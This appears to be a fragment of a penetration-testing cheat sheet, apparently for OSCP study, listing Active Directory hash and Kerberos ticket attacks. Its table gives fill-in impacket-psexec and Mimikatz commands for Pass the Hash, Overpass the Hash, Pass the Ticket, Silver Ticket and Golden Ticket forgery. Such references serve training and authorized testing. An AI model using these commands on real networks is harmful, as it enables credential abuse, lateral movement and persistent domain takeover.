| User NTLM Hash | Pass the Hash, Silver Ticket (if SPN hash), WMI/WinRM/PsExec |

Hash Attack Reference

📖 See also: Lateral Movement - Pass the Hash | Kerberos Attacks - Golden Ticket

| Attack | When to Use | Command |
|---|---|---|
| Pass the Hash | Have NTLM hash, need shell | `impacket-psexec -hashes :<HASH> user@target` |
| Overpass the Hash | Have NTLM, need Kerberos ticket | `sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH> /run:powershell` |
| Pass the Ticket | Have .kirbi or .ccache ticket | `kerberos::ptt ticket.kirbi` |
| Silver Ticket | Have the NTLM hash of the service (SPN) account | `kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<DOMAIN_SID> /target:<HOST_FQDN> /service:http /rc4:<HASH> /ptt` |
| Golden Ticket | Have krbtgt hash (persistence) | `kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<DOMAIN_SID> /krbtgt:<HASH> /ptt` |

See Also

Related AD Exploitation Files

Post-Exploitation & Movement

OSCP Preparation


External Resources